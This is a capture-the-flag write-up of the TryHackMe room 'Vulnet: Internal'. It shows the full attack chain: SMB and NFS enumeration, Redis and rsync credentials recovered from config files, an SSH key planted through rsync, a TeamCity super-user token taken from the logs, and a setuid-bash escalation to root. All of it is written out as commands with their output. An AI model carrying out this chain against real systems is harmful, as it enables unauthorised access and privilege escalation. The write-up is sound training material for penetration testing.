TryHackMe | Vulnet-Internal

A room on TryHackMe created by TheCyb3rW0lf featuring various services to exploit.

Vulnet : Internal

Tasks

  • services flag

Vulnerabilities

  • Sensitive files in SMB share with Anonymous Login.

NMAP

PORT     STATE    SERVICE     REASON      VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
| 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38337/tcp6 mountd
| 100005 1,2,3 40435/udp mountd
| 100005 1,2,3 46762/udp6 mountd
| 100005 1,2,3 56457/tcp mountd
| 100021 1,3,4 40452/udp6 nlockmgr
| 100021 1,3,4 41523/tcp6 nlockmgr
| 100021 1,3,4 42869/udp nlockmgr
| 100021 1,3,4 43173/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
9090/tcp filtered zeus-admin no-response
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNNET-INTERNA<00> Flags: <unique><active>
| VULNNET-INTERNA<03> Flags: <unique><active>
| VULNNET-INTERNA<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 21990/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46838/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19384/udp): CLEAN (Failed to receive data)
| Check 4 (port 39015/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-05-14T15:40:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-14T13:40:20
|_ start_date: N/A

From our Nmap scan we can see a lot of services port are open such as samba and NFS. Usually my first step is to check the web server but since we don’t have one we can check out the SMB server first.

Enum4linux

========================================= 
| Share Enumeration on 10.10.106.60 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))

I used a tool called Enum4linux that is used to enumerate SMB, you can also use other preferred tools to do this. We can connect to the ‘shares’ share using SMBclient. In there we will find some sensitive information and our first flag.

NFS

Next we’ll proceed with the NFS server, but what is actually NFS?

  • It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory
showmount -e $IP
mkdir /tmp/NFS
sudo mount -t nfs $IP:/opt/conf /tmp/NFS

showmount -e $IP will show us the file names that are available on the server.Then we create a mount point and mount it, we can then navigate to the mounted file to view it.After looking around a bit, I found some interesting stuff in redis.conf

requirepass "B65Hx562F@ggAZ@F"

Seem’s like a password to redis-server

Redis

Before diving into redis, what is it actually?

  • Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability.
redis-cli -h $IP

Enter the password we found using AUTH or supply -a in the initial command followed by the password

  • Since Redis uses key-value database, let’s get all keys using KEYS *
10.10.106.60:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "tmp"
5) "int"

Our second flag and some sensitive information but particularly ‘authlist’. Checking out the type of authlist it seems like a list.

  • Use lrange to list out authlist
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
  • Using Cyberchef it is indeed Base64 encoded.
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Rsync

  • Rsync, or Remote Sync, is a free command-line tool that lets you transfer files and directories to local and remote destinations. Rsync is used for mirroring, performing backups, or migrating data to other server
rsync $IP::
  • Let’s try to connect to the server using rsync
rsync $IP::files
Password:
@ERROR: auth failed on module files
rsync error: error starting client-server protocol (code 5) at main.c(1814) [Receiver=3.2.3]

Weird, we’re unable to connect even though with the correct password.

  • Let’s try to copy all the files instead
rsync -av rsync://rsync-connect@$IP/files ctf_files

-a means archive while -v is verbose.

  • Opening up the copied files we have sys-internal which is the user’s home where we will find user.txt
rsync -av .ssh/id_rsa.pub rsync://rsync-connect@$IP/files/sys-internal/.ssh/authorized_keys

Later we can login using the private key.

Privesc

  • We don’t know the password for sys-internal but we can upload and run linpeas.sh
sys-internal@vulnnet-internal:~$ ss -tno
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 84 10.10.106.60:2049 10.17.1.163:982 timer:(on,744ms,0)
ESTAB 0 108 10.10.106.60:22 10.17.1.163:47754 timer:(on,784ms,0)
ESTAB 0 0 [::ffff:127.0.0.1]:59073 [::ffff:127.0.0.1]:8111
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:58999 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:59073

Let’s try to get something on port 8111

sudo ssh sys-internal@10.10.106.60 -i .ssh/id_rsa -L 8111:127.0.0.1:8111

We can now navigate to webpage on http://127.0.0.1:8111 which brings us to a login page for TeamCity.

  • Perhaps there is more on this SSH server. Navigating to / there is a TeamCity directory,there’s a lot of directories and files in there but one interesting directory for us CTF players are the logs. They were a lot of logs but I was most interested in the catalina.out and teamcity-auth.log
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)

After looking around, I found multiples tokens for super user and tried all of them and one of them worked out.

  • Now let’s manually create a project and next create a build configuration for the project.
chmod u+s /bin/bash

Now let’s run our project and see the permissions of bash now.

bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash

Now simply run the binary to get root privileges

bash-4.4$ /bin/bash -p
bash-4.4# whoami
root

In the end this was an interesting room and I learned a lot about internal services and a new way for privesc.

Student that loves FOSS